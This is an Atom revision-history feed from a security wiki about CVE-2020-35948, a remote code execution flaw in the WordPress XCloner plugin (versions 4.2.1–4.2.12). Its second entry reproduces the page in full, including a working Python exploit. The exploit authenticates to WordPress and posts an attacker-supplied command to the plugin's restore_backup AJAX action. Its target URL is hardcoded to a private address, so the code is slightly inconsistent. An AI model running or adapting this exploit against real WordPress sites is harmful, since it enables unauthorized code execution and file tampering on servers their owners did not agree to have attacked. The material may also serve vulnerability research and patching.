<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2020-35948 wordpress Plugin XCloner 4.2.12 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T12:21:41Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6120&amp;oldid=prev</id>
		<title>Pwnwiki: Marked this version for translation</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6120&amp;oldid=prev"/>
		<updated>2021-07-02T03:15:20Z</updated>

		<summary type="html">&lt;p&gt;Marked this version for translation&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;chinese&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 03:15, 2 July 2021&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==漏洞影響==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==漏洞影響== &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;!--T:1--&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;/translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;lt;/translate&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Version: 4.2.1 - 4.2.12&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Version: 4.2.1 - 4.2.12&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key pwn_wiki:diff::1.12:old-6117:rev-6120 --&gt;
&lt;/table&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6117&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;languages /&gt; &lt;translate&gt; ==漏洞影響== &lt;/translate&gt; Version: 4.2.1 - 4.2.12  ==EXP== &lt;pre&gt; # Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authen...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6117&amp;oldid=prev"/>
		<updated>2021-07-02T03:14:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;languages /&amp;gt; &amp;lt;translate&amp;gt; ==漏洞影響== &amp;lt;/translate&amp;gt; Version: 4.2.1 - 4.2.12  ==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authen...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&amp;lt;translate&amp;gt;&lt;br /&gt;
==漏洞影響==&lt;br /&gt;
&amp;lt;/translate&amp;gt;&lt;br /&gt;
Version: 4.2.1 - 4.2.12&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)&lt;br /&gt;
# Date 30.06.2021&lt;br /&gt;
# Exploit Author: Ron Jost (Hacker5preme)&lt;br /&gt;
# Vendor Homepage: https://www.xcloner.com/&lt;br /&gt;
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip&lt;br /&gt;
# Version: 4.2.1 - 4.2.12&lt;br /&gt;
# Tested on: Ubuntu 18.04&lt;br /&gt;
# CVE: CVE-2020-35948&lt;br /&gt;
# CWE: CWE-732&lt;br /&gt;
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Description:&lt;br /&gt;
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, &lt;br /&gt;
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, &lt;br /&gt;
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Banner:&lt;br /&gt;
'''&lt;br /&gt;
banner = &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  &lt;br /&gt;
 #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # &lt;br /&gt;
 #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # &lt;br /&gt;
 #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  &lt;br /&gt;
 #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # &lt;br /&gt;
 #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # &lt;br /&gt;
  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  &lt;br /&gt;
                                                                                                             &lt;br /&gt;
                                                                                                             &lt;br /&gt;
                                                                &lt;br /&gt;
                                                                by @Hacker5preme&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
print(banner)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Import required modules:&lt;br /&gt;
'''&lt;br /&gt;
import requests&lt;br /&gt;
import argparse&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
User-Input:&lt;br /&gt;
'''&lt;br /&gt;
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')&lt;br /&gt;
my_parser.add_argument('-T', '--IP', type=str)&lt;br /&gt;
my_parser.add_argument('-P', '--PORT', type=str)&lt;br /&gt;
my_parser.add_argument('-U', '--PATH', type=str)&lt;br /&gt;
my_parser.add_argument('-u', '--USERNAME', type=str)&lt;br /&gt;
my_parser.add_argument('-p', '--PASSWORD', type=str)&lt;br /&gt;
args = my_parser.parse_args()&lt;br /&gt;
target_ip = args.IP&lt;br /&gt;
target_port = args.PORT&lt;br /&gt;
wp_path = args.PATH&lt;br /&gt;
username = args.USERNAME&lt;br /&gt;
password = args.PASSWORD&lt;br /&gt;
print('')&lt;br /&gt;
ajax_cmd = input('[*] Ajax Command to execute: ')&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Authentication:&lt;br /&gt;
'''&lt;br /&gt;
session = requests.Session()&lt;br /&gt;
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'&lt;br /&gt;
&lt;br /&gt;
# Header:&lt;br /&gt;
header = {&lt;br /&gt;
    'Host': target_ip,&lt;br /&gt;
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',&lt;br /&gt;
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',&lt;br /&gt;
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',&lt;br /&gt;
    'Accept-Encoding': 'gzip, deflate',&lt;br /&gt;
    'Content-Type': 'application/x-www-form-urlencoded',&lt;br /&gt;
    'Origin': 'http://' + target_ip,&lt;br /&gt;
    'Connection': 'close',&lt;br /&gt;
    'Upgrade-Insecure-Requests': '1'&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# Body:&lt;br /&gt;
body = {&lt;br /&gt;
    'log':  username, &lt;br /&gt;
    'pwd': password, &lt;br /&gt;
    'wp-submit': 'Log In', &lt;br /&gt;
    'testcookie': '1'&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# Authenticate:&lt;br /&gt;
print('')&lt;br /&gt;
auth = session.post(auth_url, headers=header, data=body)&lt;br /&gt;
auth_header= auth.headers['Set-Cookie']&lt;br /&gt;
if 'wordpress_logged_in' in auth_header:&lt;br /&gt;
    print('[+] Authentication successfull !')&lt;br /&gt;
else:&lt;br /&gt;
    print('[-] Authentication failed !')&lt;br /&gt;
    exit()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Exploit:&lt;br /&gt;
'''&lt;br /&gt;
url_exploit = &amp;quot;http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup&amp;quot;&lt;br /&gt;
&lt;br /&gt;
header = {&lt;br /&gt;
    &amp;quot;Accept&amp;quot;: &amp;quot;*/*&amp;quot;,&lt;br /&gt;
    &amp;quot;Content-Type&amp;quot;: &amp;quot;multipart/form-data; boundary=------------------------08425016980d7357&amp;quot;,&lt;br /&gt;
    &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# Body:&lt;br /&gt;
body = &amp;quot;--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\&amp;quot;xcloner_action\&amp;quot;\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n&amp;quot; % (ajax_cmd)&lt;br /&gt;
&lt;br /&gt;
exploit = session.post(url_exploit, headers=header, data=body)&lt;br /&gt;
print('')&lt;br /&gt;
print(exploit.text)&lt;br /&gt;
print('')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>